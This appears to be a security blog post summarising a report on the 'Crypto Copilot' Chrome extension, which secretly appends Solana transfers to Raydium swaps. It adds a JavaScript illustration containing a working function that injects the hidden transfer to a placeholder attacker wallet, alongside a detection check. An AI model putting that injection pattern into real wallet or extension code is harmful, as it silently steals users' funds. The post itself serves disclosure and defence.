
Hidden Danger: Chrome Extension Exploits Solana Wallets

  • Nov 27, 2025
  • 2 min read

Key Findings


  • Researchers at Socket have identified a malicious Chrome extension named "Crypto Copilot" that injects a hidden Solana transfer into every Raydium swap transaction it builds.

  • The extension silently appends an extra transfer instruction to each swap, diverting the larger of 0.0013 SOL or 0.05% of the trade amount to an attacker-controlled wallet.

  • The malicious code is obfuscated, and the extension's user interface shows only the legitimate swap details, so the extra transfer is never presented to the user.

  • The extension communicates with a backend that appears to exist mainly to pass Chrome Web Store review and lend the tool a veneer of legitimacy.


Background


The "Crypto Copilot" Chrome extension was first published on May 7, 2024, by a user named "sjclark76". Its listing describes it as letting users "trade crypto directly on X with real-time insights and seamless execution."


Malicious Behavior


  • The extension appends an extra "SystemProgram.transfer" instruction to every Raydium swap transaction, sending a portion of the funds to a hardcoded attacker-controlled wallet. Because all instructions in a Solana transaction are signed and executed together, the single approval the user gives for the swap also authorizes the added transfer.

  • The skimmed amount is the larger of a flat 0.0013 SOL and 0.05% of the swap amount. The two are equal at a swap of 2.6 SOL (0.05% of 2.6 SOL is 0.0013 SOL), so the flat minimum applies to smaller swaps and the percentage to larger ones.

  • The injection logic is hidden by minification and variable renaming, which makes it hard to spot by reading the extension's bundled code.


Backend Infrastructure


  • The extension communicates with a backend hosted on the domain "crypto-coplilot-dashboard.vercel[.]app" to register connected wallets, fetch points and referral data, and report user activity.

  • Neither that domain nor "cryptocopilot[.]app" hosts a real product, which suggests the backend is a facade rather than a working service.

  • The extension also embeds a Helius RPC API key directly in the client code, so anyone who unpacks the extension can extract and abuse that credential.


Impact and Mitigation


  • The theft is hard for victims to notice: the amount per swap is small, and the user interface displays only the legitimate swap details.

  • At the time of the report the extension remained available on the Chrome Web Store; Socket has submitted a takedown request to Google.

  • Users are advised to be cautious with third-party crypto-related extensions and, before signing, to review the full instruction list of a transaction rather than only the summary an extension's UI presents. In this case the tell is a System Program transfer to an unfamiliar address riding alongside the swap instruction.
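As an added illustration (not code from the report, from Socket, or from the extension itself), the following dependency-free JavaScript models both the pattern described under Malicious Behavior and the pre-signing review recommended above: it encodes a System Program transfer the way Solana does (u32 little-endian instruction index 2, then u64 little-endian lamports), appends one to a stand-in swap using the fee rule from the report, and then scans the instruction list for transfers to recipients the user did not expect. The instruction shape mirrors the programId/keys/data fields of a @solana/web3.js TransactionInstruction but uses plain strings for keys; the wallet addresses and the swap program id are constructed placeholders, and the swap instruction's data is a dummy byte, since the page does not describe Raydium's actual instruction layout.

```javascript
// Added example; models the "extra SystemProgram.transfer appended to a swap"
// pattern and the pre-signing check that catches it. No external dependencies.

const SYSTEM_PROGRAM_ID = "11111111111111111111111111111111"; // Solana System Program id
const SYSTEM_TRANSFER_INDEX = 2;   // SystemInstruction::Transfer enum index
const LAMPORTS_PER_SOL = 1_000_000_000n;

// Fee rule from the report: the larger of 0.0013 SOL and 0.05% (5 bps) of the swap.
const MIN_SKIM_LAMPORTS = 1_300_000n;  // 0.0013 SOL
const SKIM_BPS = 5n;

function skimLamports(swapLamports) {
  const pct = (BigInt(swapLamports) * SKIM_BPS) / 10_000n;
  return pct > MIN_SKIM_LAMPORTS ? pct : MIN_SKIM_LAMPORTS;
}

// System Program Transfer data: u32 LE instruction index, then u64 LE lamports.
function encodeTransferData(lamports) {
  const buf = new Uint8Array(12);
  const view = new DataView(buf.buffer);
  view.setUint32(0, SYSTEM_TRANSFER_INDEX, true);
  view.setBigUint64(4, BigInt(lamports), true);
  return buf;
}

// Returns the lamport amount if `data` is a Transfer, otherwise null.
function decodeTransferData(data) {
  if (data.length !== 12) return null;
  const view = new DataView(data.buffer, data.byteOffset, data.byteLength);
  if (view.getUint32(0, true) !== SYSTEM_TRANSFER_INDEX) return null;
  return view.getBigUint64(4, true);
}

// What the report describes: append a transfer from the payer to a hardcoded
// wallet after the legitimate swap instruction, sized by the fee rule above.
function injectSkim(instructions, payer, attackerWallet, swapLamports) {
  return [
    ...instructions,
    {
      programId: SYSTEM_PROGRAM_ID,
      keys: [
        { pubkey: payer, isSigner: true, isWritable: true },          // from
        { pubkey: attackerWallet, isSigner: false, isWritable: true }, // to
      ],
      data: encodeTransferData(skimLamports(swapLamports)),
    },
  ];
}

// Pre-signing check: every System Program transfer whose destination is not
// in the set the user expects (own accounts, addresses the swap UI displayed).
function findUnexpectedTransfers(instructions, allowedRecipients) {
  const allowed = new Set(allowedRecipients);
  const hits = [];
  for (const ix of instructions) {
    if (ix.programId !== SYSTEM_PROGRAM_ID) continue;
    const lamports = decodeTransferData(ix.data);
    if (lamports === null) continue; // some other System Program call
    const to = ix.keys[1]?.pubkey;
    if (!allowed.has(to)) hits.push({ to, lamports });
  }
  return hits;
}

// Constructed sample input: placeholder keys and a stand-in swap instruction.
const USER = "UserWallet11111111111111111111111111111111";
const ATTACKER = "AttackerWallet1111111111111111111111111111";
const SWAP_PROGRAM = "SwapProgramPlaceholder11111111111111111111"; // not the real Raydium id
const swapLamports = 5n * LAMPORTS_PER_SOL; // user intends to swap 5 SOL

const legitimate = [
  { programId: SWAP_PROGRAM, keys: [{ pubkey: USER, isSigner: true, isWritable: true }], data: new Uint8Array([9]) },
];
const tampered = injectSkim(legitimate, USER, ATTACKER, swapLamports);

console.log(findUnexpectedTransfers(legitimate, [USER])); // []
console.log(findUnexpectedTransfers(tampered, [USER]));   // [{ to: ATTACKER, lamports: 2500000n }]
```

On a 5 SOL swap the percentage branch wins (0.05% of 5 SOL is 0.0025 SOL, i.e. 2,500,000 lamports); on a 1 SOL swap the flat 0.0013 SOL minimum applies. A real wallet sees program ids and account keys as indexes into the message's account list rather than as strings, but the check is the same: decode each System Program instruction and confirm every transfer destination is one you meant to pay.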


Sources


  • https://thehackernews.com/2025/11/chrome-extension-caught-injecting.html

  • https://securityonline.info/hidden-theft-crypto-copilot-chrome-extension-drains-solana-wallets-on-x/

  • https://www.reddit.com/r/SecOpsDaily/comments/1p75z59/chrome_extension_caught_injecting_hidden_solana/

  • https://x.com/TheCyberSecHub/status/1993646721377935603

  • https://www.xt.com/en/blog/post/chrome-extension-caught-injecting-hidden-solana-transfer-fees-into-raydium-swaps-the-hacker-news

  • https://www.cypro.se/2025/11/26/chrome-extension-caught-injecting-hidden-solana-transfer-fees-into-raydium-swaps/

© 2025 by Explain IT Again.